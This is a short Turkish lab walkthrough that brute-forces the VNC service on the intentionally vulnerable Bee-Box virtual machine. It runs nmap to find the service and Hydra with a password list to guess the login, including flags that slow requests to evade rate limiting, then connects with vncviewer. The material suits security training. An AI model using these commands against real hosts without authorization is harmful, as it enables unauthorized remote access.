Yazıda kullanılan Bee-Box sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
Bu sanal makine üzerinde VNC servisi hizmet vermektedir.
netstat -nlpt | grep vnc
192.168.133.159 IP adresli sanal makineye port taraması gerçekleştirildiğinde de 5901 portunda VNC servisinin hizmet verdiği görülebilmektedir.
nmap -Pn -n –open -p5900-5905 -sV 192.168.133.159
Bu servise kaba kuvvet saldırı için kullanılabilecek parolalar; “Parolalar” dosyasına kaydedilmiştir.
cat Parolalar
Hydra aracına bu parola dosyası verilerek kaba kuvvet saldırısı gerçekleştirilebilir.
hydra -P Parolalar vnc://192.168.133.159:5901
Not: Eğer VNC sunucusu üzerinde zaman/talep bazlı bir kısıtlama varsa, eş zamanlı talep sayısı azaltılabilir ve talepler arasındaki süre arttırılabilir.
hydra -P Parolalar vnc://192.168.133.159:5901 -t 1 -W 30
Elde edilen parola bilgisi ile VNC erişimi elde edilebilir.
vncviewer 192.168.133.159:5901
Kaynak:
https://paulsec.github.io/blog/2014/04/21/bwapp-write-up/